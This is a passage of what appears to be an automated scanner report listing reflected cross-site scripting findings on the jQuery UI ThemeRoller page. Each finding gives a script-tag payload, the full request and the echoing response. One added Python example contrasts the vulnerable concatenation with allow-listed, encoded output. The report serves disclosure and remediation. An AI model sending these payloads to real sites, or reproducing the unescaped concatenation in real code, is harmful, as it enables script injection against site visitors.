aaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:23 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba717a0"><script>alert(1)</script>8ae54f49d58&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgT
...[SNIP]...

3.166. http://jqueryui.com/themeroller/ [borderColorError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a34db"><script>alert(1)</script>974427909eb was submitted in the borderColorError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0aa34db"><script>alert(1)</script>974427909eb&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:50 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
1_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0aa34db"><script>alert(1)</script>974427909eb&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&op
...[SNIP]...

3.167. http://jqueryui.com/themeroller/ [borderColorHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d610a"><script>alert(1)</script>664987fb5fe was submitted in the borderColorHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CFd610a"><script>alert(1)</script>664987fb5fe&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:10 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
oller&ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CFd610a"><script>alert(1)</script>664987fb5fe&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefaul
...[SNIP]...

3.168. http://jqueryui.com/themeroller/ [borderColorHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 97c1c"><script>alert(1)</script>8b71ac69cdd was submitted in the borderColorHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e97c1c"><script>alert(1)</script>8b71ac69cdd&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e97c1c"><script>alert(1)</script>8b71ac69cdd&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgT
...[SNIP]...

3.169. http://jqueryui.com/themeroller/ [borderColorHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4924"><script>alert(1)</script>b7e5d296fe2 was submitted in the borderColorHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666e4924"><script>alert(1)</script>b7e5d296fe2&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:31 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
nset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666e4924"><script>alert(1)</script>b7e5d296fe2&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec
...[SNIP]...

3.170. http://jqueryui.com/themeroller/ [cornerRadius parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks: the response shows it inside the href of the <link rel="stylesheet"> tag that loads /themeroller/css/parseTheme.css.php with the full ThemeRoller query string. The payload bb0c1"><script>alert(1)</script>2173eee1a85 was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response, so the "> in the payload closes the attribute and the tag, and the <script> element that follows is parsed as markup inside <head>.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5pxbb0c1"><script>alert(1)</script>2173eee1a85&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:05 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5pxbb0c1"><script>alert(1)</script>2173eee1a85&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.pn
...[SNIP]...
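
The response snippet above shows the sink behind this whole run of findings (3.160 to 3.171 and the other ThemeRoller parameters): every theme parameter is concatenated into the href of the <link rel="stylesheet"> tag that loads /themeroller/css/parseTheme.css.php, so a double quote in any one of them ends the attribute and the tag. The Python below is an added example, not the site's code, contrasting that construction with an allow-listed and encoded one. The parameter names are those in the scanned requests; the allow-list patterns are assumptions derived from the legitimate values those requests carry (hex colours, NN_name.png textures, px lengths, 0-100 opacities); PAYLOAD is this finding's cornerRadius payload appended to the legitimate value, and GOOD_THEME is a constructed subset of the scanned request.

```python
import html
import re
from urllib.parse import urlencode

# Allow-list per ThemeRoller parameter family. Names come from the scanned
# requests; the accepted value shapes are assumptions based on the legitimate
# values seen there ("66B2E6", "05_inset_soft.png", "8px", "-8px", "75").
RULES = [
    (re.compile(r"^(bgColor|borderColor|fc|iconColor)\w+$"), re.compile(r"^[0-9a-fA-F]{6}$")),
    (re.compile(r"^bgTexture\w+$"),                          re.compile(r"^\d{2}_[a-z_]+\.png$")),
    (re.compile(r"^(bgImgOpacity|opacity)\w+$"),             re.compile(r"^(100|[1-9]?\d)$")),
    (re.compile(r"^(cornerRadius\w*|fsDefault|thicknessShadow|offset\w+Shadow)$"),
                                                             re.compile(r"^-?\d{1,3}px$")),
    (re.compile(r"^ffDefault$"),                             re.compile(r"^[A-Za-z ,\-]{1,80}$")),
    (re.compile(r"^fwDefault$"),                             re.compile(r"^(normal|bold)$")),
]

STYLESHEET = "/themeroller/css/parseTheme.css.php"

# Constructed theme: a subset of the values in the scanned request.
GOOD_THEME = {
    "ffDefault": "arial, helvetica, sans-serif",
    "fwDefault": "bold",
    "fsDefault": "12px",
    "cornerRadius": "5px",
    "bgColorHeader": "66B2E6",
    "bgTextureHeader": "04_highlight_hard.png",
    "bgImgOpacityHeader": "55",
    "offsetTopShadow": "-8px",
}
# The report's cornerRadius payload, appended to the legitimate value as in the request.
PAYLOAD = '5pxbb0c1"><script>alert(1)</script>2173eee1a85'
EVIL_THEME = dict(GOOD_THEME, cornerRadius=PAYLOAD)


class BadThemeParam(ValueError):
    pass


def validate_theme(params):
    """Return only allow-listed name/value pairs; unknown names are rejected too."""
    clean = {}
    for name, value in params.items():
        for name_re, value_re in RULES:
            if name_re.match(name):
                if not value_re.match(value):
                    raise BadThemeParam(f"{name}={value!r} rejected")
                clean[name] = value
                break
        else:
            raise BadThemeParam(f"unknown parameter {name!r}")
    return clean


def accepts(params):
    """Yes/no form of validate_theme for callers that do not want the exception."""
    try:
        validate_theme(params)
        return True
    except BadThemeParam:
        return False


def _link_tag(href):
    return f'<link rel="stylesheet" href="{href}" type="text/css" media="all" />'


def vulnerable_link(params):
    """The construction the report's response implies: raw values concatenated
    straight into the href attribute. A '"' in any value ends the attribute."""
    qs = "&".join(f"{k}={v}" for k, v in params.items())
    return _link_tag(f"{STYLESHEET}?ctl=themeroller&{qs}")


def encoded_link(params):
    """Encoding only: percent-encode each value for the URL, then entity-encode
    the whole URL for the attribute. The payload survives as inert text."""
    href = f"{STYLESHEET}?" + urlencode({"ctl": "themeroller", **params})
    return _link_tag(html.escape(href, quote=True))


def hardened_link(params):
    """Defence in depth: allow-list first, then the same two encoding layers."""
    return encoded_link(validate_theme(params))


if __name__ == "__main__":
    print(vulnerable_link(EVIL_THEME))
    print(encoded_link(EVIL_THEME))
    print(hardened_link(GOOD_THEME))
```

In PHP, where the scanned application runs, the two encoding layers correspond to http_build_query() for the query string and htmlspecialchars($href, ENT_QUOTES) for the attribute. Encoding alone already removes the breakout; the allow-list stays in front of it because it also keeps arbitrary strings out of whatever consumes the query string on the server side.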

3.171. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e67ff"><script>alert(1)</script>d6da6a382c8 was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8pxe67ff"><script>alert(1)</script>d6da6a382c8 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:11:32 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
yOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8pxe67ff"><script>alert(1)</script>d6da6a382c8" type="text/css" media="all" />
...[SNIP]...

3.172. http://jqueryui.com/themeroller/ [fcActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f82b"><script>alert(1)</script>9800a832c8e was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=222222&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=3636367f82b"><script>alert(1)</script>9800a832c8e&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:38 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=3636367f82b"><script>alert(1)</script>9800a832c8e&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTe
...[SNIP]...

3.173. http://jqueryui.com/themeroller/ [fcContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c309"><script>alert(1)</script>9ef676458d7 was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=arial,%20helvetica,%20sans-serif&fwDefault=bold&fsDefault=12px&cornerRadius=5px&bgColorHeader=66B2E6&bgTextureHeader=04_highlight_hard.png&bgImgOpacityHeader=55&borderColorHeader=3984CF&fcHeader=ffffff&iconColorHeader=6b747b&bgColorContent=f7f7f7&bgTextureContent=06_inset_hard.png&bgImgOpacityContent=100&borderColorContent=cccccc&fcContent=2222227c309"><script>alert(1)</script>9ef676458d7&iconColorContent=6b6e70&bgColorDefault=d5d6d8&bgTextureDefault=06_inset_hard.png&bgImgOpacityDefault=85&borderColorDefault=b0b6ba&fcDefault=000000&iconColorDefault=5888ad&bgColorHover=e2e1df&bgTextureHover=05_inset_soft.png&bgImgOpacityHover=75&borderColorHover=666666&fcHover=676f74&iconColorHover=217bc0&bgColorActive=9aff8a&bgTextureActive=05_inset_soft.png&bgImgOpacityActive=100&borderColorActive=10390e&fcActive=363636&iconColorActive=f9bd01&bgColorHighlight=fbec88&bgTextureHighlight=01_flat.png&bgImgOpacityHighlight=55&borderColorHighlight=fad42e&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 02:09:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120130

